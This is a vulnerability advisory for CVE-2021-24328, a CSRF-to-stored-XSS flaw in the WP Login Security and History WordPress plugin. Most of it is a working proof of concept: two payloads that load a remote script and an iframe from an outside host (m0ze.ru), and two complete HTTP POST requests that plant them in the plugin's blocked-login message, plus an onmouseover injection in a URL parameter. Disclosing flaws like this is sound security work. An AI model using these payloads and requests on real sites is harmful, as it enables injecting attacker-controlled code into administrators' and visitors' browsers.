WP Login Security and History <= 1.0 – CSRF to Stored Cross-Site Scripting (XSS) | CVE 2021-24328

Description

The plugin did not have CSRF check when saving its settings, not any sanitisation or validation on them. This could allow attackers to make logged in administrators change the plugin's settings to arbitrary values, and set XSS payloads on them as well

Proof of Concept

### -- [ Payloads: ]

[$] "><script src=https://m0ze.ru/payload/a.js></script>

[$] "><iframe src=https://m0ze.ru/payload/xfsii.html></iframe>


### -- [ PoC #1 | Authenticated Persistent XSS & XFS | Blocker page message: ]

[!] POST /wp-admin/options-general.php?page=wp_login_security_and_history.php&page_num=%22+onmouseover%3Dalert%28%29+1&tab=2 HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 252
Cookie: [admin cookies]

can_show_captcha_option=1&show_captcha_count_option=1337&can_block_login_trials=1&login_max_trials=1337&login_block_time=13&login_blocked_msg=%22%3E%3Cscript+src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fa.js%3E%3C%2Fscript%3E&Save_Options=++Update+Options++



### -- [ PoC #2 | Authenticated Persistent XSS & XFS | Blocker page message: ]

[!] POST /wp-admin/options-general.php?page=wp_login_security_and_history.php&page_num=%22+onmouseover%3Dalert%28%29+1&tab=2 HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 258
Cookie: [admin cookies]

can_show_captcha_option=1&show_captcha_count_option=1337&can_block_login_trials=1&login_max_trials=1337&login_block_time=13&login_blocked_msg=%22%3E%3Ciframe+src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fxfsii.html%3E%3C%2Fiframe%3E&Save_Options=++Update+Options++